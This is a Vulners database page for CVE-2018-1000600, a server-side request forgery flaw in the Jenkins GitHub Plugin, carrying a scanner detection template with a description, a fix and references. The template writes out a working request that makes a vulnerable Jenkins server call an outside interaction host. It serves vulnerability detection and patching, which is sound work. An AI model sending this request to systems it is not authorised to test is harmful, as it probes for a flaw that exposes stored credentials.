| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2018-1000600 | 21 Sep 202106:42 | – | circl | |
| CloudBees Jenkins GitHub Plugin Information Disclosure Vulnerability (CNVD-2018-12811) | 9 Jul 201800:00 | – | cnvd | |
| CVE-2018-1000600 | 26 Jun 201817:00 | – | cve | |
| CVE-2018-1000600 | 26 Jun 201817:00 | – | cvelist | |
| CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials | 13 May 202201:48 | – | github | |
| CVE-2018-1000600 | 26 Jun 201817:29 | – | nvd | |
| GHSA-6CVM-V6QJ-HJQ9 CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials | 13 May 202201:48 | – | osv | |
| Design/Logic Flaw | 26 Jun 201817:29 | – | prion | |
| CVE-2018-1000600 | 28 Jun 201809:49 | – | redhatcve | |
| CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials | 25 Jun 201800:00 | – | jenkins |
id: CVE-2018-1000600
info:
name: Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery
author: geeknik
severity: high
description: |
Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the network.
remediation: |
Upgrade Jenkins GitHub Plugin to version 1.29.2 or later to mitigate the vulnerability.
reference:
- https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
- https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
- https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000600
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2018-1000600
cwe-id: CWE-200
epss-score: 0.90894
epss-percentile: 0.99794
cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:*
metadata:
max-request: 1
vendor: jenkins
product: github
framework: jenkins
tags: cve,cve2018,jenkins,ssrf,oast,github,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 4b0a00483046022100bdbb777a60848b570a84e143f80273262d3c612dd3ad6200a56061d816b0382f022100a87de8985a2ea00bb8560ecf7c6f0f7f92e05119cbc9380fa5877e14e11b36f1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation